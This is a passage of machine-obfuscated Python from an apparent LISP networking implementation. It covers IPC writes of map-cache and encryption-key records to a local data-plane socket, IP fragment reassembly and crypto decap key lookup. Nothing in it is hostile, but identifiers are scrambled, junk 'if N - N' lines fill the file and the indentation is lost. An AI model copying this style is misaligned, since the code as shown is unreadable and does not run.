if 29 - 29: Oo0Ooo - I1IiiI . Ii1I
if 65 - 65: OoO0O00
if 16 - 16: IiII % I1IiiI % iIii1I11I1II1 . I1IiiI . I1ii11iIi11i - IiII
if 6 - 6: I1Ii111 + OoO0O00 + O0 * OoOoOO00 . iIii1I11I1II1 . I1Ii111
if 93 - 93: ooOoO0o % iIii1I11I1II1 + I1ii11iIi11i
if 74 - 74: OoOoOO00 + I1ii11iIi11i
if 82 - 82: II111iiii
def lisp_write_to_dp_socket ( entry ) :
try :
O0oI1I1IiIII1i = json . dumps ( entry )
i1iI1i1i1Ii1Ii11 = bold ( "Write IPC" , False )
lprint ( "{} record to named socket: '{}'" . format ( i1iI1i1i1Ii1Ii11 , O0oI1I1IiIII1i ) )
lisp_ipc_dp_socket . sendto ( O0oI1I1IiIII1i , lisp_ipc_dp_socket_name )
except :
lprint ( "Failed to write IPC record to named socket: '{}'" . format ( O0oI1I1IiIII1i ) )
if 47 - 47: iIii1I11I1II1 % II111iiii . II111iiii
return
if 54 - 54: ooOoO0o * iII111i
if 52 - 52: I11i + iII111i
if 9 - 9: OoOoOO00 % II111iiii . I11i * Oo0Ooo
if 53 - 53: II111iiii / i1IIi + OoooooooOO * O0
if 62 - 62: IiII . O0
if 87 - 87: I1ii11iIi11i / oO0o / IiII . OOooOOo
if 91 - 91: OOooOOo % oO0o . OoOoOO00 . I1IiiI - OoOoOO00
if 18 - 18: O0 - I1IiiI + i1IIi % i11iIiiIii
if 97 - 97: iII111i * OoooooooOO + I1Ii111 + ooOoO0o - ooOoO0o
def lisp_write_ipc_keys ( rloc ) :
Oo0o = rloc . rloc . print_address_no_iid ( )
O00oo0o0o0oo = rloc . translated_port
if ( O00oo0o0o0oo != 0 ) : Oo0o += ":" + str ( O00oo0o0o0oo )
if ( Oo0o not in lisp_rloc_probe_list ) : return
if 63 - 63: o0oOOo0O0Ooo * OOooOOo + iIii1I11I1II1 + Oo0Ooo
for I1I1iIiiiiII11 , I1i , o0O0Ooo in lisp_rloc_probe_list [ Oo0o ] :
I11 = lisp_map_cache . lookup_cache ( I1i , True )
if ( I11 == None ) : continue
lisp_write_ipc_map_cache ( True , I11 )
if 25 - 25: oO0o + IiII % o0oOOo0O0Ooo
return
if 24 - 24: OoOoOO00
if 87 - 87: I1ii11iIi11i / ooOoO0o * i1IIi
if 71 - 71: OoOoOO00 - I11i
if 83 - 83: oO0o + oO0o - Oo0Ooo . Oo0Ooo - iII111i . OOooOOo
if 56 - 56: OoOoOO00 * IiII + i1IIi
if 40 - 40: I1ii11iIi11i / O0
if 87 - 87: ooOoO0o
def lisp_write_ipc_map_cache ( add_or_delete , mc , dont_send = False ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 100 - 100: iII111i + II111iiii * Oo0Ooo * OOooOOo
if 6 - 6: IiII % OOooOOo
if 3 - 3: OoOoOO00 / OoOoOO00 - II111iiii
if 41 - 41: oO0o
o0ooOOoO0oO0 = "add" if add_or_delete else "delete"
iIiiI11II11i = { "type" : "map-cache" , "opcode" : o0ooOOoO0oO0 }
if 12 - 12: I1IiiI + I1Ii111
oOoiii = ( mc . group . is_null ( ) == False )
if ( oOoiii ) :
iIiiI11II11i [ "eid-prefix" ] = mc . group . print_prefix_no_iid ( )
iIiiI11II11i [ "rles" ] = [ ]
else :
iIiiI11II11i [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
iIiiI11II11i [ "rlocs" ] = [ ]
if 66 - 66: I1Ii111 + OOooOOo + I1Ii111 . OoooooooOO * oO0o / OoO0O00
iIiiI11II11i [ "instance-id" ] = str ( mc . eid . instance_id )
if 74 - 74: O0 % OOooOOo * OoOoOO00 / oO0o - Oo0Ooo
if ( oOoiii ) :
if ( len ( mc . rloc_set ) >= 1 and mc . rloc_set [ 0 ] . rle ) :
for IIIi11i1 in mc . rloc_set [ 0 ] . rle . rle_forwarding_list :
oOOOo0o = IIIi11i1 . address . print_address_no_iid ( )
O00oo0o0o0oo = str ( 4341 ) if IIIi11i1 . translated_port == 0 else str ( IIIi11i1 . translated_port )
if 79 - 79: Ii1I + IiII
I1I1iIiiiiII11 = { "rle" : oOOOo0o , "port" : O00oo0o0o0oo }
OoooOOoOO , II111IiII1iII = IIIi11i1 . get_encap_keys ( )
I1I1iIiiiiII11 = lisp_build_json_keys ( I1I1iIiiiiII11 , OoooOOoOO , II111IiII1iII , "encrypt-key" )
iIiiI11II11i [ "rles" ] . append ( I1I1iIiiiiII11 )
if 43 - 43: iII111i * i11iIiiIii
if 71 - 71: o0oOOo0O0Ooo % OoOoOO00 / iII111i - OoooooooOO - IiII
else :
for OooOOoOO0OO in mc . rloc_set :
if ( OooOOoOO0OO . rloc . is_ipv4 ( ) == False and OooOOoOO0OO . rloc . is_ipv6 ( ) == False ) :
continue
if 54 - 54: Ii1I . I11i
if ( OooOOoOO0OO . up_state ( ) == False ) : continue
if 97 - 97: I1Ii111
O00oo0o0o0oo = str ( 4341 ) if OooOOoOO0OO . translated_port == 0 else str ( OooOOoOO0OO . translated_port )
if 18 - 18: I1Ii111 - i1IIi
I1I1iIiiiiII11 = { "rloc" : OooOOoOO0OO . rloc . print_address_no_iid ( ) , "priority" :
str ( OooOOoOO0OO . priority ) , "weight" : str ( OooOOoOO0OO . weight ) , "port" :
O00oo0o0o0oo }
OoooOOoOO , II111IiII1iII = OooOOoOO0OO . get_encap_keys ( )
I1I1iIiiiiII11 = lisp_build_json_keys ( I1I1iIiiiiII11 , OoooOOoOO , II111IiII1iII , "encrypt-key" )
iIiiI11II11i [ "rlocs" ] . append ( I1I1iIiiiiII11 )
if 76 - 76: I1ii11iIi11i - I1Ii111 % IiII . Ii1I + OoooooooOO * OoOoOO00
if 47 - 47: Oo0Ooo
if 81 - 81: I1Ii111 * o0oOOo0O0Ooo . oO0o % iIii1I11I1II1 - OoOoOO00 * OoO0O00
if ( dont_send == False ) : lisp_write_to_dp_socket ( iIiiI11II11i )
return ( iIiiI11II11i )
if 32 - 32: I1Ii111 + Ii1I / Oo0Ooo - OoO0O00
if 30 - 30: iIii1I11I1II1
if 68 - 68: Oo0Ooo / I1Ii111 / i1IIi + iII111i
if 46 - 46: OOooOOo
if 68 - 68: o0oOOo0O0Ooo . OoooooooOO + OoOoOO00 + OoOoOO00 + oO0o * OoOoOO00
if 18 - 18: ooOoO0o . II111iiii . OOooOOo * I11i + O0 / iIii1I11I1II1
if 31 - 31: O0 - OoOoOO00
def lisp_write_ipc_decap_key ( rloc_addr , keys ) :
if ( lisp_i_am_itr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 90 - 90: O0
if 62 - 62: iIii1I11I1II1
if 65 - 65: ooOoO0o / Ii1I + I11i . i1IIi + i1IIi . o0oOOo0O0Ooo
if 21 - 21: I1IiiI + Oo0Ooo / Ii1I * OoooooooOO
if ( keys == None or len ( keys ) == 0 or keys [ 1 ] == None ) : return
if 71 - 71: o0oOOo0O0Ooo % ooOoO0o / oO0o - oO0o / OoooooooOO
OoooOOoOO = keys [ 1 ] . encrypt_key
II111IiII1iII = keys [ 1 ] . icv_key
if 91 - 91: iIii1I11I1II1 - O0 * o0oOOo0O0Ooo * o0oOOo0O0Ooo . II111iiii
if 69 - 69: II111iiii - Oo0Ooo + i1IIi . II111iiii + o0oOOo0O0Ooo
if 20 - 20: OoooooooOO - OoO0O00 * ooOoO0o * OoOoOO00 / OOooOOo
if 64 - 64: O0 + iII111i / I11i * OoOoOO00 + o0oOOo0O0Ooo + I1Ii111
ii1i111I11 = rloc_addr . split ( ":" )
if ( len ( ii1i111I11 ) == 1 ) :
iIiiI11II11i = { "type" : "decap-keys" , "rloc" : ii1i111I11 [ 0 ] }
else :
iIiiI11II11i = { "type" : "decap-keys" , "rloc" : ii1i111I11 [ 0 ] , "port" : ii1i111I11 [ 1 ] }
if 3 - 3: iII111i - oO0o
iIiiI11II11i = lisp_build_json_keys ( iIiiI11II11i , OoooOOoOO , II111IiII1iII , "decrypt-key" )
if 20 - 20: iII111i . I1IiiI + I1Ii111 * Ii1I . iII111i
lisp_write_to_dp_socket ( iIiiI11II11i )
return
if 99 - 99: O0
if 26 - 26: oO0o / o0oOOo0O0Ooo
if 82 - 82: iIii1I11I1II1 * iIii1I11I1II1 . I1ii11iIi11i
if 7 - 7: I1Ii111 % O0 . iIii1I11I1II1
if 19 - 19: iIii1I11I1II1
if 97 - 97: Ii1I . I11i / ooOoO0o + Oo0Ooo
if 100 - 100: iII111i / I1Ii111 % OoOoOO00 . O0 / OoOoOO00
if 81 - 81: OoO0O00 % i11iIiiIii / OoO0O00 + ooOoO0o
def lisp_build_json_keys ( entry , ekey , ikey , key_type ) :
if ( ekey == None ) : return ( entry )
if 100 - 100: O0 . Oo0Ooo % Oo0Ooo % O0 / i11iIiiIii
entry [ "keys" ] = [ ]
III11II111 = { "key-id" : "1" , key_type : ekey , "icv-key" : ikey }
entry [ "keys" ] . append ( III11II111 )
return ( entry )
if 56 - 56: IiII - OOooOOo - OoOoOO00 - I11i
if 57 - 57: i1IIi
if 41 - 41: I11i / Ii1I
if 1 - 1: II111iiii / iII111i
if 83 - 83: OoO0O00 / iII111i
if 59 - 59: I1Ii111 % OOooOOo . I1IiiI + I1ii11iIi11i % oO0o
if 96 - 96: OoO0O00
def lisp_write_ipc_database_mappings ( ephem_port ) :
if ( lisp_i_am_etr == False ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 53 - 53: oO0o + OoO0O00
if 58 - 58: iIii1I11I1II1 + OoOoOO00
if 65 - 65: iII111i % Oo0Ooo * iIii1I11I1II1 + I1IiiI + II111iiii
if 72 - 72: OoOoOO00 . OoooooooOO - OOooOOo
iIiiI11II11i = { "type" : "database-mappings" , "database-mappings" : [ ] }
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
for II1II1Iii1I in lisp_db_list :
if ( II1II1Iii1I . eid . is_ipv4 ( ) == False and II1II1Iii1I . eid . is_ipv6 ( ) == False ) : continue
O0OO0OoOO = { "instance-id" : str ( II1II1Iii1I . eid . instance_id ) ,
"eid-prefix" : II1II1Iii1I . eid . print_prefix_no_iid ( ) }
iIiiI11II11i [ "database-mappings" ] . append ( O0OO0OoOO )
if 72 - 72: I1ii11iIi11i - IiII + OoO0O00 . o0oOOo0O0Ooo
lisp_write_to_dp_socket ( iIiiI11II11i )
if 95 - 95: I1Ii111 - I1IiiI % I1IiiI / O0 % iII111i
if 37 - 37: i1IIi . I1Ii111 - oO0o
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: i1IIi / IiII . O0
if 72 - 72: OOooOOo
iIiiI11II11i = { "type" : "etr-nat-port" , "port" : ephem_port }
lisp_write_to_dp_socket ( iIiiI11II11i )
return
if 20 - 20: i11iIiiIii + Oo0Ooo * Oo0Ooo % OOooOOo
if 66 - 66: I1ii11iIi11i + iII111i / Ii1I / I1IiiI * i11iIiiIii
if 41 - 41: Ii1I / Oo0Ooo . OoO0O00 . iIii1I11I1II1 % IiII . I11i
if 59 - 59: O0 + II111iiii + IiII % Oo0Ooo
if 71 - 71: oO0o
if 75 - 75: Oo0Ooo * oO0o + iIii1I11I1II1 / Oo0Ooo
if 51 - 51: Ii1I * Ii1I + iII111i * oO0o / OOooOOo - ooOoO0o
def lisp_write_ipc_interfaces ( ) :
if ( lisp_i_am_etr ) : return
if ( lisp_ipc_dp_socket == None ) : return
if ( lisp_check_dp_socket ( ) == False ) : return
if 16 - 16: I1Ii111 + O0 - O0 * iIii1I11I1II1 / iII111i
if 4 - 4: iII111i
if 75 - 75: I1IiiI * IiII % OoO0O00 - ooOoO0o * iII111i
if 32 - 32: iII111i
iIiiI11II11i = { "type" : "interfaces" , "interfaces" : [ ] }
if 59 - 59: OoOoOO00 - I1Ii111
for i1i1111I in list ( lisp_myinterfaces . values ( ) ) :
if ( i1i1111I . instance_id == None ) : continue
O0OO0OoOO = { "interface" : i1i1111I . device ,
"instance-id" : str ( i1i1111I . instance_id ) }
iIiiI11II11i [ "interfaces" ] . append ( O0OO0OoOO )
if 34 - 34: ooOoO0o . OoooooooOO / ooOoO0o + OoooooooOO
if 24 - 24: OoooooooOO * I1ii11iIi11i / O0 / Oo0Ooo * I1IiiI / ooOoO0o
lisp_write_to_dp_socket ( iIiiI11II11i )
return
if 33 - 33: Ii1I
if 20 - 20: Ii1I + I11i
if 98 - 98: OOooOOo
if 58 - 58: i11iIiiIii / OoOoOO00
if 18 - 18: ooOoO0o + O0 - OOooOOo + iIii1I11I1II1 . OOooOOo * iIii1I11I1II1
if 83 - 83: OoO0O00 - Oo0Ooo * I1IiiI % Oo0Ooo % oO0o
if 64 - 64: OoOoOO00 + oO0o / OoooooooOO . i11iIiiIii / II111iiii
if 55 - 55: ooOoO0o . i11iIiiIii . o0oOOo0O0Ooo
if 52 - 52: IiII . oO0o + i11iIiiIii % IiII
if 45 - 45: i1IIi - I1IiiI / IiII - I1IiiI
if 21 - 21: IiII
if 43 - 43: IiII
if 9 - 9: OOooOOo * ooOoO0o + ooOoO0o . I1Ii111
if 8 - 8: IiII * iIii1I11I1II1
def lisp_parse_auth_key ( value ) :
O0O = value . split ( "[" )
I11iIIIiiiI1 = { }
if ( len ( O0O ) == 1 ) :
I11iIIIiiiI1 [ 0 ] = value
return ( I11iIIIiiiI1 )
if 20 - 20: OoOoOO00 % I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
if 84 - 84: OoooooooOO
for I1IIii in O0O :
if ( I1IIii == "" ) : continue
OOOooo0OooOoO = I1IIii . find ( "]" )
oo0OO0oo = I1IIii [ 0 : OOOooo0OooOoO ]
try : oo0OO0oo = int ( oo0OO0oo )
except : return
if 95 - 95: o0oOOo0O0Ooo
I11iIIIiiiI1 [ oo0OO0oo ] = I1IIii [ OOOooo0OooOoO + 1 : : ]
if 22 - 22: ooOoO0o / o0oOOo0O0Ooo - OoooooooOO / Oo0Ooo - I1Ii111 / OOooOOo
return ( I11iIIIiiiI1 )
if 41 - 41: oO0o . II111iiii
if 47 - 47: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 23 - 23: i11iIiiIii / I11i + i1IIi % I1Ii111
if 100 - 100: Oo0Ooo
if 13 - 13: I1IiiI + ooOoO0o * II111iiii
if 32 - 32: iIii1I11I1II1 + O0 + i1IIi
if 28 - 28: IiII + I11i
if 1 - 1: OoooooooOO - i11iIiiIii . OoooooooOO - o0oOOo0O0Ooo - OOooOOo * I1Ii111
if 56 - 56: Ii1I . OoO0O00
if 43 - 43: iII111i * iII111i
if 31 - 31: O0 - iIii1I11I1II1 . I11i . oO0o
if 96 - 96: OoooooooOO * iIii1I11I1II1 * Oo0Ooo
if 76 - 76: OoO0O00 / i11iIiiIii % ooOoO0o % I11i * O0
if 84 - 84: II111iiii - iII111i / IiII . O0 % i1IIi / I1ii11iIi11i
if 2 - 2: OoooooooOO . OoO0O00 . II111iiii / Ii1I - OOooOOo % Oo0Ooo
def lisp_reassemble ( packet ) :
o0I1IiiiiI1i1I = socket . ntohs ( struct . unpack ( "H" , packet [ 6 : 8 ] ) [ 0 ] )
if 47 - 47: OOooOOo * oO0o
if 41 - 41: OoooooooOO * I1IiiI
if 3 - 3: IiII
if 96 - 96: I11i - OOooOOo + I11i
if ( o0I1IiiiiI1i1I == 0 or o0I1IiiiiI1i1I == 0x4000 ) : return ( packet )
if 71 - 71: Oo0Ooo
if 48 - 48: o0oOOo0O0Ooo / II111iiii / OoOoOO00 * o0oOOo0O0Ooo + I1IiiI . OoOoOO00
if 52 - 52: Ii1I / OoOoOO00 . OOooOOo * IiII . OoooooooOO
if 6 - 6: i1IIi . oO0o % IiII . Oo0Ooo % I11i
i11I1iiii = socket . ntohs ( struct . unpack ( "H" , packet [ 4 : 6 ] ) [ 0 ] )
iiiIiiI11iI = socket . ntohs ( struct . unpack ( "H" , packet [ 2 : 4 ] ) [ 0 ] )
if 86 - 86: OoooooooOO + IiII % o0oOOo0O0Ooo . i1IIi . iII111i
I1III1I1i11i = ( o0I1IiiiiI1i1I & 0x2000 == 0 and ( o0I1IiiiiI1i1I & 0x1fff ) != 0 )
iIiiI11II11i = [ ( o0I1IiiiiI1i1I & 0x1fff ) * 8 , iiiIiiI11iI - 20 , packet , I1III1I1i11i ]
if 54 - 54: I1Ii111 . IiII - o0oOOo0O0Ooo . iIii1I11I1II1
if 8 - 8: i1IIi / I1ii11iIi11i * O0 . i11iIiiIii . oO0o * I1IiiI
if 100 - 100: O0 / OOooOOo
if 1 - 1: I1ii11iIi11i + iII111i
if 61 - 61: oO0o - OOooOOo % II111iiii + IiII + O0 / o0oOOo0O0Ooo
if 78 - 78: I11i
if 32 - 32: II111iiii / II111iiii + o0oOOo0O0Ooo + OoooooooOO
if 34 - 34: i11iIiiIii + iIii1I11I1II1 - i11iIiiIii * o0oOOo0O0Ooo - iII111i
if ( o0I1IiiiiI1i1I == 0x2000 ) :
iiI1iiIiiiI1I , i111I1 = struct . unpack ( "HH" , packet [ 20 : 24 ] )
iiI1iiIiiiI1I = socket . ntohs ( iiI1iiIiiiI1I )
i111I1 = socket . ntohs ( i111I1 )
if ( i111I1 not in [ 4341 , 8472 , 4789 ] and iiI1iiIiiiI1I != 4341 ) :
lisp_reassembly_queue [ i11I1iiii ] = [ ]
iIiiI11II11i [ 2 ] = None
if 87 - 87: OOooOOo * OoO0O00
if 61 - 61: iII111i - II111iiii . I1Ii111 % II111iiii / I11i
if 86 - 86: II111iiii
if 94 - 94: o0oOOo0O0Ooo % Ii1I * Ii1I % Oo0Ooo / I1ii11iIi11i
if 40 - 40: Oo0Ooo . II111iiii / II111iiii - i1IIi
if 91 - 91: Ii1I
if ( i11I1iiii not in lisp_reassembly_queue ) :
lisp_reassembly_queue [ i11I1iiii ] = [ ]
if 45 - 45: I1ii11iIi11i + Oo0Ooo
if 72 - 72: I1ii11iIi11i
if 5 - 5: i1IIi
if 31 - 31: iII111i - OoooooooOO + oO0o / OoooooooOO + I1ii11iIi11i
if 93 - 93: o0oOOo0O0Ooo * I1ii11iIi11i % I1IiiI * ooOoO0o
queue = lisp_reassembly_queue [ i11I1iiii ]
if 37 - 37: OoO0O00 * OoooooooOO / oO0o * I11i * I1ii11iIi11i
if 42 - 42: OoooooooOO - ooOoO0o . OOooOOo + OoOoOO00
if 53 - 53: o0oOOo0O0Ooo
if 55 - 55: ooOoO0o . i1IIi - ooOoO0o + O0 + I1IiiI
if 31 - 31: OoO0O00 % I1Ii111
if ( len ( queue ) == 1 and queue [ 0 ] [ 2 ] == None ) :
dprint ( "Drop non-LISP encapsulated fragment 0x{}" . format ( lisp_hex_string ( i11I1iiii ) . zfill ( 4 ) ) )
if 62 - 62: oO0o / O0 - I1Ii111 . IiII
return ( None )
if 81 - 81: i11iIiiIii
if 57 - 57: O0
if 85 - 85: i11iIiiIii - i11iIiiIii - OoOoOO00 / II111iiii - II111iiii
if 4 - 4: I1ii11iIi11i * O0 / OoO0O00 * II111iiii . iIii1I11I1II1 / OOooOOo
if 97 - 97: i1IIi - OoOoOO00 . OoooooooOO
queue . append ( iIiiI11II11i )
queue = sorted ( queue )
if 24 - 24: iIii1I11I1II1 + OOooOOo * iII111i % IiII % OOooOOo
if 64 - 64: IiII . I1ii11iIi11i - o0oOOo0O0Ooo - ooOoO0o + OoooooooOO
if 95 - 95: iII111i . I1ii11iIi11i + ooOoO0o + o0oOOo0O0Ooo % OoO0O00
if 50 - 50: iII111i * O0 % II111iiii
oOOOo0o = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
oOOOo0o . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
oOOoOOOo0 = oOOOo0o . print_address_no_iid ( )
oOOOo0o . address = socket . ntohl ( struct . unpack ( "I" , packet [ 16 : 20 ] ) [ 0 ] )
oO00o0Oo00 = oOOOo0o . print_address_no_iid ( )
oOOOo0o = red ( "{} -> {}" . format ( oOOoOOOo0 , oO00o0Oo00 ) , False )
if 78 - 78: II111iiii % I1Ii111 . I1ii11iIi11i
dprint ( "{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}" . format ( bold ( "Received" , False ) , " non-LISP encapsulated" if iIiiI11II11i [ 2 ] == None else "" , oOOOo0o , lisp_hex_string ( i11I1iiii ) . zfill ( 4 ) ,
# I11i - I1IiiI
# OoO0O00 + Oo0Ooo + iII111i / IiII . Oo0Ooo - iII111i
lisp_hex_string ( o0I1IiiiiI1i1I ) . zfill ( 4 ) ) )
if 35 - 35: OoOoOO00 + o0oOOo0O0Ooo . II111iiii . O0 * OoooooooOO
if 1 - 1: oO0o * II111iiii + i1IIi * oO0o % I1IiiI
if 53 - 53: i11iIiiIii . I1ii11iIi11i - OOooOOo - OOooOOo
if 97 - 97: I1IiiI % iII111i % OoooooooOO / ooOoO0o / i11iIiiIii
if 7 - 7: O0 % IiII / o0oOOo0O0Ooo
if ( queue [ 0 ] [ 0 ] != 0 or queue [ - 1 ] [ 3 ] == False ) : return ( None )
o00O0O0 = queue [ 0 ]
for oo0O00o0O0Oo in queue [ 1 : : ] :
o0I1IiiiiI1i1I = oo0O00o0O0Oo [ 0 ]
I111II11IIii , IiiiiI1IiIi = o00O0O0 [ 0 ] , o00O0O0 [ 1 ]
if ( I111II11IIii + IiiiiI1IiIi != o0I1IiiiiI1i1I ) : return ( None )
o00O0O0 = oo0O00o0O0Oo
if 73 - 73: OoOoOO00
lisp_reassembly_queue . pop ( i11I1iiii )
if 44 - 44: Oo0Ooo / oO0o
if 9 - 9: i1IIi % I1IiiI + OoO0O00 * ooOoO0o / iIii1I11I1II1 / iII111i
if 80 - 80: OOooOOo / O0 % IiII * OoOoOO00
if 53 - 53: OOooOOo + i11iIiiIii
if 25 - 25: i11iIiiIii
packet = queue [ 0 ] [ 2 ]
for oo0O00o0O0Oo in queue [ 1 : : ] : packet += oo0O00o0O0Oo [ 2 ] [ 20 : : ]
if 51 - 51: iII111i . ooOoO0o
dprint ( "{} fragments arrived for packet 0x{}, length {}" . format ( bold ( "All" , False ) , lisp_hex_string ( i11I1iiii ) . zfill ( 4 ) , len ( packet ) ) )
if 70 - 70: I11i / O0 - I11i + o0oOOo0O0Ooo . ooOoO0o . o0oOOo0O0Ooo
if 6 - 6: I11i + II111iiii - I1Ii111
if 45 - 45: i1IIi / iII111i + i11iIiiIii * I11i + ooOoO0o / OoooooooOO
if 56 - 56: I11i + I1Ii111
if 80 - 80: II111iiii . Ii1I + o0oOOo0O0Ooo / II111iiii / OoO0O00 + iIii1I11I1II1
iI = socket . htons ( len ( packet ) )
i111ii1II11ii = packet [ 0 : 2 ] + struct . pack ( "H" , iI ) + packet [ 4 : 6 ] + struct . pack ( "H" , 0 ) + packet [ 8 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : 20 ]
if 29 - 29: o0oOOo0O0Ooo + OoOoOO00 + ooOoO0o - I1ii11iIi11i
if 64 - 64: O0 / OoooooooOO
i111ii1II11ii = lisp_ip_checksum ( i111ii1II11ii )
return ( i111ii1II11ii + packet [ 20 : : ] )
if 28 - 28: I1ii11iIi11i + oO0o . Oo0Ooo % iIii1I11I1II1 / I1Ii111
if 8 - 8: O0 . I1IiiI * o0oOOo0O0Ooo + I1IiiI
if 44 - 44: i1IIi % iII111i . i11iIiiIii / I11i + OoooooooOO
if 21 - 21: OoOoOO00 . OoO0O00 . OoOoOO00 + OoOoOO00
if 30 - 30: I1IiiI - iII111i - OOooOOo + oO0o
if 51 - 51: Ii1I % O0 / II111iiii . Oo0Ooo
if 90 - 90: i11iIiiIii * II111iiii % iIii1I11I1II1 . I1ii11iIi11i / Oo0Ooo . OOooOOo
if 77 - 77: OoO0O00
def lisp_get_crypto_decap_lookup_key ( addr , port ) :
Oo0o = addr . print_address_no_iid ( ) + ":" + str ( port )
if ( Oo0o in lisp_crypto_keys_by_rloc_decap ) : return ( Oo0o )
if 95 - 95: II111iiii
Oo0o = addr . print_address_no_iid ( )
if ( Oo0o in lisp_crypto_keys_by_rloc_decap ) : return ( Oo0o )
if 59 - 59: iIii1I11I1II1 % OOooOOo / OoOoOO00 * I1Ii111 * OoooooooOO * O0
if 43 - 43: OoO0O00 * I1IiiI * OOooOOo * O0 - O0 / o0oOOo0O0Ooo
if 77 - 77: I11i % I1Ii111 . IiII % OoooooooOO * o0oOOo0O0Ooo
if 87 - 87: iII111i + IiII / ooOoO0o * ooOoO0o * OOooOOo
if 97 - 97: I1Ii111
for I1IIi in lisp_crypto_keys_by_rloc_decap :
OoOOOO = I1IIi . split ( ":" )
if ( len ( OoOOOO ) == 1 ) : continue
OoOOOO = OoOOOO [ 0 ] if len ( OoOOOO ) == 2 else ":" . join ( OoOOOO [ 0 : - 1 ] )
if ( OoOOOO == Oo0o ) :
O0o0O0 = lisp_crypto_keys_by_rloc_decap [ I1IIi ]
lisp_crypto_keys_by_rloc_decap [ Oo0o ] = O0o0O0
return ( Oo0o )
if 78 - 78: o0oOOo0O0Ooo - I1ii11iIi11i
if 6 - 6: OoO0O00 / IiII - I1ii11iIi11i + o0oOOo0O0Ooo . OOooOOo
return ( None )
if 70 - 70: OoOoOO00 % iIii1I11I1II1 + II111iiii / IiII
if 46 - 46: I11i
if 58 - 58: Ii1I
if 35 - 35: OoO0O00 + OoOoOO00
if 22 - 22: II111iiii / I1IiiI + o0oOOo0O0Ooo * I1IiiI . OoooooooOO * OOooOOo
if 49 - 49: I1ii11iIi11i * I1IiiI + OOooOOo + i11iIiiIii * I1ii11iIi11i . o0oOOo0O0Ooo
if 36 - 36: o0oOOo0O0Ooo - i11iIiiIii
if 37 - 37: O0 + IiII + I1IiiI
if 50 - 50: OoooooooOO . I1Ii111
if 100 - 100: ooOoO0o * ooOoO0o - Ii1I
if 13 - 13: iII111i . I11i * OoO0O00 . i1IIi . iIii1I11I1II1 - o0oOOo0O0Ooo
def lisp_build_crypto_decap_lookup_key ( addr , port ) :
addr = addr . print_address_no_iid ( )
O0oOOoO000 = addr + ":" + str ( port )
if 30 - 30: IiII / i11iIiiIii
if ( lisp_i_am_rtr ) :
if ( addr in lisp_rloc_probe_list ) : return ( addr )
if 79 - 79: Ii1I . IiII . oO0o * O0
if 99 - 99: OOooOOo * iIii1I11I1II1 - iII111i / O0 % OoooooooOO + iIii1I11I1II1
if 87 - 87: II111iiii * iIii1I11I1II1 - i11iIiiIii . Ii1I . Ii1I % OOooOOo
if 27 - 27: o0oOOo0O0Ooo
if 27 - 27: I1Ii111 % i1IIi
if 93 - 93: I1Ii111 / o0oOOo0O0Ooo
for i1II11 in list ( lisp_nat_state_info . values ( ) ) :
for Iiii1iiI in i1II11 :
if ( addr == Iiii1iiI . address ) : return ( O0oOOoO000 )
if 33 - 33: OOooOOo * IiII * OoO0O00 - I1ii11iIi11i % OoO0O00
if 16 - 16: OoO0O00 * I1IiiI
return ( addr )
if 58 - 58: oO0o * II111iiii * O0
return ( O0oOOoO000 )
if 89 - 89: I1Ii111 + IiII % I1ii11iIi11i
if 80 - 80: Oo0Ooo + ooOoO0o + IiII
if 76 - 76: I1Ii111
if 23 - 23: O0 % I1ii11iIi11i % iIii1I11I1II1
if 49 - 49: iII111i + I1Ii111 % OoOoOO00
if 67 - 67: Ii1I
if 27 - 27: Oo0Ooo / i11iIiiIii / II111iiii . Ii1I - II111iiii / OoO0O00
def lisp_set_ttl ( lisp_socket , ttl ) :
try :
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_TTL , ttl )
lisp_socket . setsockopt ( socket . SOL_IP , socket . IP_MULTICAST_TTL , ttl )
except :
lprint ( "socket.setsockopt(IP_TTL) not supported" )
pass
if 61 - 61: ooOoO0o - OOooOOo
return
if 45 - 45: O0 . OoO0O00
if 80 - 80: IiII + OoO0O00
if 2 - 2: IiII + OoOoOO00 % oO0o
if 76 - 76: o0oOOo0O0Ooo
if 25 - 25: OoooooooOO
if 78 - 78: oO0o / i11iIiiIii * O0 / OOooOOo % i11iIiiIii % O0
if 86 - 86: IiII
def lisp_is_rloc_probe_request ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x12 )
if 26 - 26: IiII - I1Ii111 + i11iIiiIii % ooOoO0o * i11iIiiIii + Oo0Ooo
if 39 - 39: Ii1I - i1IIi + i11iIiiIii
if 21 - 21: IiII
if 76 - 76: o0oOOo0O0Ooo % Oo0Ooo + OoO0O00
if 36 - 36: OOooOOo . oO0o
if 15 - 15: I1IiiI + ooOoO0o - o0oOOo0O0Ooo
if 62 - 62: Ii1I - OOooOOo
def lisp_is_rloc_probe_reply ( lisp_type ) :
lisp_type = struct . unpack ( "B" , lisp_type ) [ 0 ]
return ( lisp_type == 0x28 )
if 88 - 88: iIii1I11I1II1 * Oo0Ooo / II111iiii / IiII / OoO0O00 % ooOoO0o
if 19 - 19: I11i * iII111i . O0 * iII111i % I1ii11iIi11i - OoOoOO00
if 68 - 68: I1Ii111 - OoO0O00 % Ii1I + i1IIi . ooOoO0o
if 36 - 36: oO0o * iIii1I11I1II1 - O0 - IiII * O0 + i11iIiiIii
if 76 - 76: OoO0O00 % O0 / Ii1I + I1IiiI
if 23 - 23: I1IiiI % IiII . o0oOOo0O0Ooo
if 2 - 2: I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 / II111iiii / iIii1I11I1II1 / oO0o % i1IIi
if 54 - 54: ooOoO0o
if 47 - 47: I11i * I1IiiI / oO0o
